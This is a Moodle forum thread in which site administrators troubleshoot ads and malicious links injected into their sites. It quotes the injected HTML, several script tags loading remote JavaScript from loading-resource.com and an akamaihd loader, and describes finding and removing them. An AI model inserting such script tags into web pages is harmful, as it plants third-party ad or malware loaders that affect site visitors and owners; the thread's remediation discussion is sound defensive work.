someone added adds to my moodle

someone added adds to my moodle

by Dan Trouten -
Number of replies: 9

I don't know if this is new or not. Some key words in the menu are linked to malicious sites. "Courses" is one of them. how do I get rid of these?

 

Average of ratings: -
In reply to Dan Trouten

Re: someone added adds to my moodle

by Dan Trouten -

It's "powered by text enhanced".

In reply to Dan Trouten

Re: someone added adds to my moodle

by Jenny Watt -

I had the same issue. Log in as admin and turn on editing. There is an "empty" box that appears at the top of the right hand column. I removed that and the ads are gone. Trying to find where it came from now. Will post when I find it.

In reply to Jenny Watt

Re: someone added adds to my moodle

by Jenny Watt -

Well, should have looked into it more before I deleted it. I just wanted the thing gone. Thinking it was an HTML block. Saw JavaScript code from other sites. This was one of them:

http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862

This was another:

http://loading-resource.com/data.geo.php?callback=window.__geo.getData

I just moved that particular site to a new host so gonna go through and check file permissions and such. Thinking this was a "hacker" attack.

Please let me know if anyone else is experiencing this.

Thanks!

Jenny

In reply to Jenny Watt

Re: someone added adds to my moodle

by Jenny Watt -

Just found it in the FrontPage settings front page description block. This is the code:

<p></p>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862" type="text/javascript"></script>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862" type="text/javascript"></script>

Still not sure how it got there in the first place, but plan to keep an eye on the site.

In reply to Jenny Watt

Re: someone added adds to my moodle

by Emma Richardson -
Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Plugin developers
I am having this same issue but cannot find where they hid the script. I have checked the html of all the description blocks on the page and in Front Page settings but still no luck. Once you got rid of it, did it come back or did you change any security measures? I am thinking this needs to be reported.
In reply to Jenny Watt

Re: someone added adds to my moodle

by Emma Richardson -
Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Plugin developers

I am going to post how I was able to track this down for anyone that had this problem.

I opened the Front Page and went to View Source.  Then I searched for loading-resource.

For me the script appeared between two of my course listings.  I went to the course directly above the script and found that the course was infected as well.  In the course, I also viewed source and found and deleted all three instances of the script.  

I also then changed the password of the offending teacher(!!) and notified her.

I will keep an eye on it but hope this maybe helps someone else.

Average of ratings:Useful (4)
In reply to Emma Richardson

Solved! Re: someone added adds to my moodle

by Glenys Hanson -
Hi Emma, Just to say thanks for this - I'm sure it'll be useful to many. Also to add "Solved!" to the Subject so people realise that there is a solution. Cheers, Glenys
In reply to Jenny Watt

Re: someone added adds to my moodle

by zeinab khadem -

HI,

I am having this same problem and I foud that some browser extensions added this script in text editors , find and delete this extension.